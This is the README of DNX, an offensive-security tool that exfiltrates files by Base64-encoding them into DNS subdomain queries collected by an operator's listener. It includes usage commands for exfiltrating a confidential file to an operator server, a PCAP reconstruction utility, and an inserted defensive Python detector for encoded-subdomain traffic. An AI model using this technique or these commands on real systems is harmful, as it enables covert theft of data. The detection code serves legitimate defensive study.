DNX is a DNS-based data exfiltration tool developed for offensive security research. It demonstrates how file contents can be encoded, transmitted through DNS queries, and reliably reconstructed on the receiving side.
The tool consists of a Python-based server component responsible for payload generation and DNS query collection, along with OS-specific client payloads that transmit data using controlled subdomains. DNX also includes an offline PCAP parsing utility to recover exfiltrated data from captured network traffic.
On startup, dnx.py generates an OS-specific client payload based on the target specified via the -t parameter (Windows or Linux). Once the payload is generated, DNX starts a lightweight DNS server that listens for incoming queries containing the user-defined domain provided through the -d parameter.
As DNS requests are received, the server extracts the subdomain portion of each matching query and stores the encoded data fragments. After transmission completes, the collected data is concatenated, Base64-decoded, and reconstructed into the original file, which is then written locally.
On the client side, the payload operates using native system utilities only. It reads the user-specified file, encodes its contents using Base64, splits the encoded data into DNS-safe chunks, and transmits each chunk by issuing successive DNS queries where the chunk is embedded as a subdomain. This process continues until the entire file has been exfiltrated.
In addition to live collection, DNX includes a standalone utility capable of parsing captured DNS traffic from a .pcap file. This utility extracts the embedded subdomain data and reconstructs the original file offline, enabling post-capture analysis without access to the running server.
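Seen from the defender's side, the transfer described above leaves a recognizable pattern in resolver logs: one client issuing many queries whose subdomains are distinct, long, Base64-looking strings under a single domain. The following Python detector is an added example, not part of DNX; the (client, query name) log format, the thresholds, the sample addresses and the two-label base-domain rule are assumptions.

```python
import base64
import math
import re
from collections import Counter, defaultdict

B64ISH = re.compile(r"[A-Za-z0-9+/=_-]+")  # standard and URL-safe Base64 alphabets

def entropy(s):
    """Shannon entropy of a string, in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def base_domain(qname):
    # Assumption: the last two labels form the registered domain.
    # Use a public-suffix list for real traffic (e.g. example.co.uk).
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def find_exfil_candidates(queries, min_len=20, min_entropy=3.5, min_unique=5):
    """Return {(client, base_domain): count} of distinct Base64-looking
    subdomains, for pairs that reach min_unique (thresholds are assumptions)."""
    seen = defaultdict(set)
    for client, qname in queries:
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue  # no subdomain part to inspect
        sub = "".join(labels[:-2])  # everything left of the base domain
        if (len(sub) >= min_len and B64ISH.fullmatch(sub)
                and entropy(sub) >= min_entropy):
            seen[(client, base_domain(qname))].add(sub)
    return {k: len(v) for k, v in seen.items() if len(v) >= min_unique}

def constructed_sample():
    """Constructed log entries (client IP, query name); not real traffic."""
    blob = base64.b64encode(bytes(range(256))).decode()
    chunks = [blob[i:i + 40] for i in range(0, len(blob), 40)]
    encoded = [("10.0.0.23", f"{c}.example.com") for c in chunks]
    benign = [
        ("10.0.0.23", "www.example.org"),
        ("10.0.0.41", "mail.example.org"),
        ("10.0.0.41", "cdn-assets-eu-west-1.static.example.net"),
    ]
    return encoded + benign

if __name__ == "__main__":
    for (client, domain), n in find_exfil_candidates(constructed_sample()).items():
        print(f"{client} -> {domain}: {n} distinct encoded-looking subdomains")
```

Counting distinct subdomains per client and domain, rather than scoring single queries, keeps one-off long hostnames such as CDN names from raising alerts.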
- OS-specific payload generation for Windows and Linux targets
- Lightweight and easy to use, with minimal setup requirements
- Live DNS server for capturing and processing exfiltration traffic
- Subdomain-based data transmission using standard DNS queries
- Base64 encoding with chunking to ensure DNS label compatibility
- Automatic reconstruction and recovery of exfiltrated files
- Offline file reconstruction from captured DNS traffic (.pcap)
- Reliable reconstruction of both text and binary data (e.g., images)
- Payloads designed to operate using native system utilities only
DNX is operated from the server side and does not require ownership of the target domain. The tool observes DNS queries containing a user-specified domain string, which is used as a matching filter during data collection.
The primary entry point is dnx.py, which handles both client payload generation and the DNS listener. The operator specifies the domain to be used in DNS queries, the destination DNS server, and the target operating system via command-line options. Chunk size can also be adjusted to control how much encoded data is embedded in each query.
Once started, DNX listens for incoming DNS requests matching the configured domain and automatically extracts and reconstructs the transmitted data.
The generated payload is executed on the target system and requires only the path to the file intended for exfiltration. It performs encoding, chunking, and transmission using native system utilities, without introducing additional dependencies.
Captured DNS traffic can also be analyzed offline using the included parsepcap.sh utility to reconstruct exfiltrated files without access to the live server.
server side:
./dnx.py [-h] -d DOMAIN -s SERVER -t {windows,linux} [-c CHUNK]
example:
./dnx.py -t windows -d example.com -s 192.168.135.40
client side:
.\win.ps1 <file_to_exfiltrate>
example:
.\win.ps1 C:\users\admin\Documents\confidential.txt
offline parsing:
./parsepcap.sh <PATH-TO-PCAP-FILE> <DOMAIN-NAME>
example:
./parsepcap.sh out.pcap example.com
DNX is provided strictly for educational, research, and authorized security testing purposes. It is intended to demonstrate DNS-based data exfiltration techniques.
Use of this tool on systems or networks without explicit permission is prohibited. The author assumes no responsibility for misuse or damage resulting from the use of this software. Users are solely responsible for ensuring that their activities comply with applicable laws, policies, and ethical guidelines.
